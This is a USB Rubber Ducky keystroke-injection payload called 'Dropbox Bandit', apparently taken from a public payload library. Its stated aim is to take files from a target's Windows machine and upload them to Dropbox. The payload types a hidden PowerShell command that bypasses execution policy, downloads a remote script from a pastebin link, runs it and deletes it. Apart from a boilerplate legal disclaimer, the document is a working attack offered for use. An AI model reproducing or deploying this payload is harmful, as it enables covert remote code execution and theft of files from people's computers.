Path: blob/master/payloads/library/exfiltration/Dropbox-Bandit/payload.txt
2968 views
REM Title: Dropbox Bandit1REM Author: Factor (github.com/Factor101)2REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account3REM Target: Windows 10/11 (Powershell)4REM Version: 1.05REM Category: Exfiltration6REM Legal: This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.78ATTACKMODE HID9REM Inital Delay10DELAY 5001112REM Open CMD13GUI r14REM Delay to allow window to open15DELAY 10016REM Launch hidden powershell window to execute our script1718REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here19REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=020REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>21REM --------- replace me! ----------22STRINGLN powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"23DELAY 2002425REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky26CAPSLOCK27ATTACKMODE OFF2829